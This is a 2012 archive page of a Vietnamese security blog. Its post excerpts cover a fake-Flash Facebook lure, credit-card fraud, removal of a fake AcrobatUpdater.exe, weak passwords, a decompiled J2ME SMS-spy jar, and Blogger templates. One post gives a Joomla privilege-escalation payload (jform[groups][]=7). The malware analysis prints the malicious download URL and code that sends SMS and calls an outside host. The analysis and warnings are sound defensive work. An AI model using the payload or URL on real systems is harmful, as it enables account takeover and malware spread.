Posts

Showing posts from 2012

[Avast] Facebook virus | Click for me, thanks!

Image
Social sites are great for people who want monetize theirs ideas. But sometimes these ideas are far more sinister.
Over the last few last weeks,  researchers at the Avast antivirus labs in Prague have noticed new attack based on a combination of social sites, fake Flash Players and the promise of illicit videos of well-known Hollywood stars.
A number of users have complained that theirs Twitter and Facebook accounts are spreading links inviting people to see an explicit ‘home movie’ of Hollywood star Kirsten Dunst. There is of course no such movie but instead the link sends users to a fake “Facebook style” site that convinces users that they can download the movie as well as various pictures. The fake “facebook style” site is also backed up by comments from other supposed Facebook users.

However, if a visitor clicks on the video, a warning pops up claiming that they have out date Flash Player with a prompt to download an update. This is a perfect example of social engineer…

[Tháng 8] Toiphammaytinh come back

Image
Sau thời gian bận rộn, giờ blog tội phạm máy tính sẽ trở lại.

- Post 1 số chủ đề nghiên cứu về Tội phạm máy tính
- Trở lại với mục Bản quyền miễn phí (dạng tổng hợp theo ngày)
- Gợi ý 1 số hướng giải quyết các vụ việc do các bạn gửi mail về
- Update các thông tin thay đổi

[Security] Cảnh báo lừa đảo thẻ tín dụng tại Việt Nam

Cảnh báo lừa đảo thẻ tín dụng

Ngày 27-7 Ngân hàng Nhà nước (NHNN) đã cảnh báo thủ đoạn lừa đảo mới của tội phạm thẻ tín dụng. Cụ thể, một số đối tượng người nước ngoài nhập cảnh vào VN mang theo các thiết bị làm giả thẻ tín dụng, đồng thời móc nối với một số đơn vị chấp nhận thanh toán thẻ trong nước thanh toán khống hàng hóa để rút tiền mặt nhằm chiếm đoạt tiền trong tài khoản của các chủ thẻ tín dụng người nước ngoài.

Thông thường hoạt động của các đối tượng này diễn ra khoảng từ 12g-17g và từ 20g-23g hằng ngày, mỗi giao dịch cách nhau 20-30 giây.

NHNN nhận định đây là thủ đoạn mới của tội phạm sử dụng công nghệ cao, gây thiệt hại cho các chủ thẻ tín dụng, đồng thời ảnh hưởng đến hoạt động thanh toán điện tử cũng như thương hiệu của nhiều ngân hàng trong nước. NHNN yêu cầu các ngân hàng rà soát những giao dịch thanh toán đáng ngờ qua POS, trong đó cần chú ý đến những đơn vị chấp nhận thanh toán thẻ có số lượng giao dịch liên tục với nhiều thẻ khác nhau vào thời gian bất thường t…

[Bug] Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

Image
Firebug: <input name="jform[groups][]" value="7" />
Tamper Data: jform[groups][]=7
Chi tiết


index.php?option=com_users&view=registration (2.x)

index.php?option=com_user&view=register (Joomla! 1.x)
1. go to mydomain + index.php?option=com_users&view=registration

2. The first time I enter de pass incorrect.

3. The second time y insert with firebug after " .

[Diệt] Malware STL | d517e448e15f3ea3b0405b7679eccfd7 | AcrobatUpdater.exe

Image
Dành cho bạn nào thắc mắc về việc làm sao xoá con malware này.

Hãy tìm trong C:\Program Files\Adobe\Updater6\ và nếu có file AcrobatUpdater.exe thì hãy làm những việc sau:

1. Vào trang web này để tải md5sum tool về: http://www.pc-tools.net/win32/md5sums/ rồi xả nén nó ra.

2. Kéo file AcrobatUpdater.exe để chồng lên file md5sums.exe để lấy giá trị hash của file AcrobatUpdater.exe.

3. Nếu giá trị hash là d517e448e15f3ea3b0405b7679eccfd7 thì đích thị nó là thủ phạm.

4. Xoá nó ngay.

5. Vào registry và xoá các key sau:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Volatile Environment]
CURRENT = "2011-07-20 16:28:52"
DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 …

[Forensic] Window 8 forensic

Image

[TOP] 25 mã PIN và mật khẩu PASSWORD tệ nhất

Image
Password | Mật khẩu

password123456123456781234qwerty12345dragonpussybaseballfootballletmeinmonkey696969abc123mustangmichaelshadowmasterjennifer1111112000jordansupermanharley1234567
PIN

1234000025801111555556830852222212121998696913791997246899997777199620113333199988881995252515901235

[Phân tích] http://210.211.100.170/g/l9.jar TQN

Image
1 post của anh TQN trên facebook






Từ khóa

"Sexy NgocTrinh>>Chi danh cho 18+. Tai MienPhi: http://210.211.100.170/g/l9.jar"

Phân tích

Trưa này, wget nó về thử xem sao. Dùng 7z unjar nó, DJ Java Decompiler để decompiler. Hì hì, hình như một dạng SMS spy. Vì code đt tui không rành lắm, post lên cho bà con chỉ giáo:
private final String MIDLET_CLASS_NAME = "GameMidlet";
private static final String SMS_CONNECTION_URL = "sms://:5678";
private static final String ALLOWED_SENDER_FILTER = "*";
....
public void run()
{
if(sendSms(h3.SMS_NUMBER, h3.SMS_CODE))
try
{
rc = RecordStore.openRecordStore(h3.RC_CODE, true);
sRecord(rc, 1);
rc.closeRecordStore();
}
......
socket://dzanchoi.vn:9002
........
Em đề nghị cơ quan có chức năn tìm ngay chủ nhân của cái IP 210.211.100.170 và dzanchoi.vn, mời nó đi ăn cơm miễn phí, mặc áo Juventus cho vui.
Bổ sung


Làm được gì ?

:))

[Lượm] Tài năng tuổi teen trong giới công nghệ

Image
Những tài năng tuổi teen trong giới công nghệ
Trong số đó có những cậu bé chỉ mới đang học tiểu học nhưng đã có thể viết hàng nghìn dòng mã để lập trình ứng dụng trên các nền tảng nổi tiếng như iOS và Android. Mới học lớp 8, Robert Nay ở Utah (Mỹ) đã viết hơn 4.000 dòng mã cho game Bubble Ball và thu hút 2 triệu lượt tải chỉ sau 2 tuần đầu năm 2011. Cậu còn sở hữu công ty riêng mang tên Nay Games.Sahil Lavingia, người Mỹ gốc Ấn, đang được coi là chàng trai tuổi teen đáng chú ý nhất thung lũng Silicon. Bằng việc thiết kế website, từ năm 15 tuổi, Lavingia đã độc lập về tài chính và tài khoản ngân hàng luôn có hơn 100.000 USD. Năm 17 tuổi, cậu là một trong những thành viên đầu tiên của mạng xã hội ảnh Pinterest. Còn hiện nay, hotboy 19 tuổi này đã thu hút được vài triệu USD cho dự án bán hàng qua mạng Gumroad của mình.Từ năm 2009 khi mới 9 tuổi và học lớp 4, cậu bé Lim Ding Wen người Singapore đã hoàn thành 20 dự án lập trình, trong đó có ứng dụng tập vẽ Doodle Kids hoạt động tr…

[Miễn phí] TOP 30 template blogspot 2012

Image
1. BoyBurnsBlog A clean minimalist template which is customizable through the Blogger Template Designer. Uses jQuery Masonary for a non-linear appearance. I particularly like how images are resized to fit the entire available space of the columns. This is an original design by Blogger Xpertise (and I hope there's more to follow!)

Demo | Download

2. Circulos Designed by Compartdisimo, this is a stunning template in which images are automatically transformed to be circular in appearance. Ideal as a portfolio template!

Demo | Download

3. O-Beat
A stunning design by Loefa-Cebook which includes an integrated slider on the home page.

Demo | Download

4. X6 Yellow

Also available in dark and light variations, this is a visually stunning template designed by Urang Kurai with a unique display of posts on the home page.

Demo | Download

5. X5 Shadow 

Another stunning Blogger template by Urang Kurai, this dark design has plenty of space for gadgets.

Demo | Download

6. Proposal Th…